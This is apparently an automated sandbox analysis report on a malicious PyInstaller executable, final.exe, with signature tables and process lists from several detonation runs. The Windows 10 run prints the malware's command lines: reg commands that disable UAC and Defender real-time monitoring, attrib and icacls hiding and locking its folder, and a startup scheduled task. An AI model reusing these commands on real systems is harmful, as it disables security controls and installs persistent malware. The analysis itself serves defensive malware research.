Analysis Overview
SHA256
d765f74af0a7e3986616b3018fd6190bd389458dcd408f208cb34072ef4eef12
Threat Level: Known bad
The file final.exe was found to be: Known bad.
Malicious Activity Summary
UAC bypass
Modifies Windows Defender Real-time Protection settings
Deletes shadow copies
Command and Scripting Interpreter: PowerShell
Disables RegEdit via registry modification
Drops file in Drivers directory
Disables Task Manager via registry modification
Possible privilege escalation attempt
Disables cmd.exe use via registry modification
Loads dropped DLL
Drops startup file
Modifies file permissions
Reads user/profile data of web browsers
Impair Defenses: Safe Mode Boot
Executes dropped EXE
Legitimate hosting services abused for malware hosting/C2
Drops desktop.ini file(s)
Looks up external IP address via web service
Hide Artifacts: Hidden Files and Directories
Enumerates processes with tasklist
Unsigned PE
Detects Pyinstaller
Event Triggered Execution: Netsh Helper DLL
System Network Configuration Discovery: Wi-Fi Discovery
Browser Information Discovery
System policy modification
Checks SCSI registry key(s)
Kills process with taskkill
Uses Task Scheduler COM API
Views/modifies file attributes
Suspicious use of WriteProcessMemory
Suspicious use of AdjustPrivilegeToken
Uses Volume Shadow Copy service COM API
Scheduled Task/Job: Scheduled Task
Delays execution with timeout.exe
Modifies registry key
Interacts with shadow copies
Suspicious behavior: EnumeratesProcesses
MITRE ATT&CK
Analysis: static1
Detonation Overview
Reported
2025-01-13 11:31
Signatures
Detects Pyinstaller
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral14
Detonation Overview
Submitted
2025-01-13 11:30
Reported
2025-01-13 11:41
Platform
android-x64-20240910-en
Command Line
Signatures
Processes
Network
Files
Analysis: behavioral17
Detonation Overview
Submitted
2025-01-13 11:30
Reported
2025-01-13 11:40
Platform
ubuntu1804-amd64-20240729-en
Max time kernel
0s
Command Line
Signatures
Processes
/tmp/final.pyc
[/tmp/final.pyc cmd /c %SIGILL% "SIGTERM|DELETE|SIGKILL"]
Network
Files
Analysis: behavioral18
Detonation Overview
Submitted
2025-01-13 11:30
Reported
2025-01-13 11:41
Platform
debian9-armhf-20240611-en
Max time kernel
0s
Command Line
Signatures
Processes
/tmp/final.pyc
[/tmp/final.pyc cmd /c %SIGILL% "SIGTERM|DELETE|SIGKILL"]
Network
Files
Analysis: behavioral19
Detonation Overview
Submitted
2025-01-13 11:30
Reported
2025-01-13 11:41
Platform
debian9-mipsbe-20240418-en
Max time kernel
0s
Command Line
Signatures
Processes
/tmp/final.pyc
[/tmp/final.pyc cmd /c %SIGILL% "SIGTERM|DELETE|SIGKILL"]
Network
Files
Analysis: behavioral7
Detonation Overview
Submitted
2025-01-13 11:30
Reported
2025-01-13 11:40
Platform
ubuntu1804-amd64-20240729-en
Max time kernel
0s
Command Line
Signatures
Processes
/tmp/final.exe
[/tmp/final.exe cmd /c %SIGILL% "SIGTERM|DELETE|SIGKILL"]
Network
Files
Analysis: behavioral10
Detonation Overview
Submitted
2025-01-13 11:30
Reported
2025-01-13 11:40
Platform
debian9-mipsel-20240729-en
Max time kernel
0s
Command Line
Signatures
Processes
/tmp/final.exe
[/tmp/final.exe cmd /c %SIGILL% "SIGTERM|DELETE|SIGKILL"]
Network
Files
Analysis: behavioral13
Detonation Overview
Submitted
2025-01-13 11:30
Reported
2025-01-13 11:41
Platform
android-x86-arm-20240624-en
Max time network
3s
Command Line
Signatures
Processes
Network
| Country | Destination | Domain | Proto |
| N/A | 224.0.0.251:5353 | udp |
Files
Analysis: behavioral15
Detonation Overview
Submitted
2025-01-13 11:30
Reported
2025-01-13 11:41
Platform
android-x64-arm64-20240910-en
Command Line
Signatures
Processes
Network
Files
Analysis: behavioral20
Detonation Overview
Submitted
2025-01-13 11:30
Reported
2025-01-13 11:41
Platform
debian9-mipsel-20240729-en
Max time kernel
0s
Command Line
Signatures
Processes
/tmp/final.pyc
[/tmp/final.pyc cmd /c %SIGILL% "SIGTERM|DELETE|SIGKILL"]
Network
Files
Analysis: behavioral1
Detonation Overview
Submitted
2025-01-13 11:30
Reported
2025-01-13 11:55
Platform
win7-20240903-en
Max time kernel
839s
Max time network
841s
Command Line
Signatures
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\final.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2976 wrote to memory of 2688 | N/A | C:\Users\Admin\AppData\Local\Temp\final.exe | C:\Users\Admin\AppData\Local\Temp\final.exe |
| PID 2976 wrote to memory of 2688 | N/A | C:\Users\Admin\AppData\Local\Temp\final.exe | C:\Users\Admin\AppData\Local\Temp\final.exe |
| PID 2976 wrote to memory of 2688 | N/A | C:\Users\Admin\AppData\Local\Temp\final.exe | C:\Users\Admin\AppData\Local\Temp\final.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\final.exe
C:\Users\Admin\AppData\Local\Temp\final.exe cmd /c %SIGILL% "SIGTERM|DELETE|SIGKILL"
C:\Users\Admin\AppData\Local\Temp\final.exe
C:\Users\Admin\AppData\Local\Temp\final.exe cmd /c %SIGILL% "SIGTERM|DELETE|SIGKILL"
Network
Files
C:\Users\Admin\AppData\Local\Temp\_MEI29762\gevent-24.11.1.dist-info\INSTALLER
| MD5 | 365c9bfeb7d89244f2ce01c1de44cb85 |
| SHA1 | d7a03141d5d6b1e88b6b59ef08b6681df212c599 |
| SHA256 | ceebae7b8927a3227e5303cf5e0f1f7b34bb542ad7250ac03fbcde36ec2f1508 |
| SHA512 | d220d322a4053d84130567d626a9f7bb2fb8f0b854da1621f001826dc61b0ed6d3f91793627e6f0ac2ac27aea2b986b6a7a63427f05fe004d8a2adfbdadc13c1 |
C:\Users\Admin\AppData\Local\Temp\_MEI29762\python312.dll
| MD5 | 3c388ce47c0d9117d2a50b3fa5ac981d |
| SHA1 | 038484ff7460d03d1d36c23f0de4874cbaea2c48 |
| SHA256 | c98ba3354a7d1f69bdca42560feec933ccba93afcc707391049a065e1079cddb |
| SHA512 | e529c5c1c028be01e44a156cd0e7cad0a24b5f91e5d34697fafc395b63e37780dc0fac8f4c5d075ad8fe4bd15d62a250b818ff3d4ead1e281530a4c7e3ce6d35 |
Analysis: behavioral3
Detonation Overview
Submitted
2025-01-13 11:30
Reported
2025-01-13 11:41
Platform
android-x86-arm-20240624-en
Max time network
6s
Command Line
Signatures
Processes
Network
| Country | Destination | Domain | Proto |
| N/A | 224.0.0.251:5353 | udp |
Files
Analysis: behavioral4
Detonation Overview
Submitted
2025-01-13 11:30
Reported
2025-01-13 11:41
Platform
android-x64-20240624-en
Max time network
4s
Command Line
Signatures
Processes
Network
| Country | Destination | Domain | Proto |
| N/A | 224.0.0.251:5353 | udp |
Files
Analysis: behavioral9
Detonation Overview
Submitted
2025-01-13 11:30
Reported
2025-01-13 11:40
Platform
debian9-mipsbe-20240418-en
Max time kernel
0s
Command Line
Signatures
Processes
/tmp/final.exe
[/tmp/final.exe cmd /c %SIGILL% "SIGTERM|DELETE|SIGKILL"]
Network
Files
Analysis: behavioral11
Detonation Overview
Submitted
2025-01-13 11:30
Reported
2025-01-13 11:40
Platform
win7-20240903-en
Max time network
0s
Command Line
Signatures
Processes
Network
Files
Analysis: behavioral16
Detonation Overview
Submitted
2025-01-13 11:30
Reported
2025-01-13 11:40
Platform
macos-20241106-en
Command Line
Signatures
Processes
Network
Files
Analysis: behavioral5
Detonation Overview
Submitted
2025-01-13 11:30
Reported
2025-01-13 11:40
Platform
android-x64-arm64-20240910-en
Command Line
Signatures
Processes
Network
Files
Analysis: behavioral6
Detonation Overview
Submitted
2025-01-13 11:30
Reported
2025-01-13 11:40
Platform
macos-20241101-en
Max time network
1s
Command Line
Signatures
Processes
Network
Files
Analysis: behavioral8
Detonation Overview
Submitted
2025-01-13 11:30
Reported
2025-01-13 11:40
Platform
debian9-armhf-20240729-en
Max time kernel
0s
Command Line
Signatures
Processes
/tmp/final.exe
[/tmp/final.exe cmd /c %SIGILL% "SIGTERM|DELETE|SIGKILL"]
Network
Files
Analysis: behavioral12
Detonation Overview
Submitted
2025-01-13 11:30
Reported
2025-01-13 11:40
Platform
win10v2004-20241007-en
Max time kernel
0s
Command Line
Signatures
Processes
Network
| Country | Destination | Domain | Proto |
| N/A | 20.44.239.154:443 | tcp |
Files
Analysis: behavioral2
Detonation Overview
Submitted
2025-01-13 11:30
Reported
2025-01-13 11:55
Platform
win10v2004-20241007-en
Max time kernel
900s
Max time network
892s
Command Line
Signatures
Modifies Windows Defender Real-time Protection settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\SYSTEM32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" | C:\Windows\SYSTEM32\reg.exe | N/A |
UAC bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Windows\system32\reg.exe | N/A |
Deletes shadow copies
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Disables RegEdit via registry modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" | C:\Windows\system32\reg.exe | N/A |
Disables Task Manager via registry modification
Disables cmd.exe use via registry modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableCMD = "1" | C:\Windows\SYSTEM32\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableCMD = "1" | C:\$Sys-Manager\systemservice92.exe | N/A |
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\drivers\etc\hosts | C:\$Sys-Manager\systemservice92.exe | N/A |
Possible privilege escalation attempt
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ffpxcvfkbk48llsu.exe | C:\$Sys-Manager\systemservice92.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\systemservice92.exe | C:\$Sys-Manager\systemservice92.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\systemservice92.exe | C:\$Sys-Manager\systemservice92.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fpu874l6h9r6pypx.exe | C:\Users\Admin\AppData\Local\Temp\final.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fpu874l6h9r6pypx.exe | C:\Users\Admin\AppData\Local\Temp\final.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ffpxcvfkbk48llsu.exe | C:\$Sys-Manager\systemservice92.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\$Sys-Manager\systemservice92.exe | N/A |
| N/A | N/A | C:\$Sys-Manager\systemservice92.exe | N/A |
Impair Defenses: Safe Mode Boot
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\Minimal | C:\$Sys-Manager\systemservice92.exe | N/A |
Loads dropped DLL
Modifies file permissions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
Reads user/profile data of web browsers
Drops desktop.ini file(s)
| Description | Indicator | Process | Target |
| File created | C:\$Sys-Manager\desktop.ini | C:\Users\Admin\AppData\Local\Temp\final.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | api.ipify.org | N/A | N/A |
| N/A | api.ipify.org | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | api64.ipify.org | N/A | N/A |
| N/A | api64.ipify.org | N/A | N/A |
| N/A | ip-api.com | N/A | N/A |
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
Hide Artifacts: Hidden Files and Directories
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
Browser Information Discovery
Detects Pyinstaller
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Event Triggered Execution: Netsh Helper DLL
| Description | Indicator | Process | Target |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\SYSTEM32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\SYSTEM32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\SYSTEM32\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
System Network Configuration Discovery: Wi-Fi Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\netsh.exe | N/A |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters | C:\Windows\system32\vssvc.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters | C:\Windows\system32\vssvc.exe | N/A |
| Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr | C:\Windows\system32\vssvc.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\PartitionTableCache = 000000000400000041ba55ff39bb976e0000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000c01200000000ffffffff00000000270101000008000041ba55ff0000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000d01200000000000020ed3a000000ffffffff00000000070001000068090041ba55ff000000000000d012000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000f0ff3a0000000000000005000000ffffffff000000000700010000f87f1d41ba55ff000000000000f0ff3a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff00000000000000000000000041ba55ff00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 | C:\Windows\system32\vssvc.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\SnapshotDataCache = 534e41505041525401000000700000008ec7416a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 | C:\Windows\system32\vssvc.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | N/A | N/A |
Interacts with shadow copies
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\vssadmin.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\reg.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
System policy modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoStore = "1" | C:\$Sys-Manager\systemservice92.exe | N/A |
Uses Task Scheduler COM API
Uses Volume Shadow Copy service COM API
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\final.exe
C:\Users\Admin\AppData\Local\Temp\final.exe cmd /c %SIGILL% "SIGTERM|DELETE|SIGKILL"
C:\Users\Admin\AppData\Local\Temp\final.exe
C:\Users\Admin\AppData\Local\Temp\final.exe cmd /c %SIGILL% "SIGTERM|DELETE|SIGKILL"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /f"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\$Sys-Manager\systemservice.bat"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib +h "C:\$Sys-Manager\systemservice92.exe""
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib +h "C:\$Sys-Manager\systemservice.bat""
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib +h "C:\$Sys-Manager""
C:\Windows\SYSTEM32\schtasks.exe
schtasks /create /tn servicebat /tr C:\$Sys-Manager\systemservice.bat /sc onstart /f
C:\Windows\system32\reg.exe
reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /f
C:\Windows\system32\attrib.exe
attrib +h "C:\$Sys-Manager\systemservice92.exe"
C:\Windows\system32\attrib.exe
attrib +h "C:\$Sys-Manager"
C:\Windows\system32\attrib.exe
attrib +h "C:\$Sys-Manager\systemservice.bat"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f"
C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
C:\Windows\system32\tasklist.exe
tasklist /FI "IMAGENAME eq systemservice92.exe"
C:\Windows\system32\find.exe
find /I "systemservice92.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "icacls "C:\$Sys-Manager" /deny *S-1-1-0:(D)"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /f"
C:\Windows\system32\reg.exe
reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /f
C:\Windows\system32\cmd.exe
